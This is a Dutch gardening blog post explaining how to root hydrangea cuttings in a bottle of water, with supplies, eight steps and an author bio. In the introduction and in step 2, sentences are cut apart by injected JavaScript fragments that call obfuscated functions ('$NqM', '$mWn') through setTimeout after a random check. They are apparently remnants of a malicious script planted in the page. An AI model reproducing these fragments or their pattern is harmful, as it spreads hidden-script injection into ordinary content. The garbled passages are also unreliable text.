Hoe stek je een hortensia?

In de tuin van vrienden staat echt een enorme hortensia met prachtige roze bloemen. Niet zomaar een hortensia, maar een kruising met een sering; hydrangea macrophylla ayesha. Deze wilde ik ook wel in de tuin hebben, maar hoe maak je precies een stekje van een hortensia?

Er zijn veel manieren om een stekje van een hortensia te maken. Gezien dit mijn eerste keer is heb ik een makkelijke methode aangehouden; een waterstekje. Je kunt dan de wortels goed zien groeien en weet precies wanneer je het stekje kan verpotten. Ik heb er gelijk een paar gemaakt; er zal er dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toch wel één lukken?

Benodigdheden

 • Scherp mes of snoeischaar
 • Hortensia
 • Flesje met water
 • Stekgrond of turfmolm en zand

Hortensia’s Stekken doe je zo!

 1. Pak een stronk waar een bloem aan zit en snijd deze schuin af onder de tweede knoop. Een knoop is het punt waar een hortensia uitloopt met een blad. Met de tweede knoop wordt dus het tweede punt op een stengel bedoeld waar een uitloper met blad te vinden is.
 2. Verwijder de bloem, maar je kunt hier ook nog mee wachten dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot deze gaat hangen of uitdroogt.
 3. Snijd het blad van de tweede knoop af.
 4. Halveer de bladeren van de eerste knoop, dit stimuleert de lichtinval en groei.
 5. Plaats het stekje in een glazen flesje met vers water zodat je de wortelgroei goed kunt zien. Zet het flesje op een zonnige plek met veel licht. Eventueel kun je een plastic zakje over het stekje plaatsen voor extra warmte.
 6. Blijf het water regelmatig verversen.
 7. Zodra de wortelgroei van het stekje duidelijk zichtbaar zijn kun je deze verpotten en in de aarde zetten. Daar kan het stekje verder groeien. Je kunt eigenlijk het hele jaar door stekjes maken, zolang ze op een warme plek staan met veel licht.
 8. Probeer stekjes die je in de zomer hebt gemaakt het eerste jaar nog niet buiten te zetten. Zodra het stekje groot en sterk genoeg is kun je deze in de tuin zetten, maar zover is het bij mij nog niet. De wortels groeien goed door en ik ben benieuwd wanneer we in de tuin van onze hortensia kunnen genieten.

Anouk - Viving.nl

De website Viving is opgezet door Anouk (28 jaar). In mijn vrije tijd besteed ik veel tijd aan het inrichten van het huis en werk ik graag in de tuin. Daarnaast ben ik dol op lekker eten en drinken. Ik sta dan ook vaak in de keuken om voor familie en vrienden te koken. Als ik in huis bezig ben dan kan ik me heerlijk ontspannen en alle inspiratie die ik hierbij op doe wil ik graag met jullie delen op deze website.

Geen Reacties op "Hoe stek je een hortensia?"

  Plaats een reactie:

  Je emailadres wordt niet weergegeven.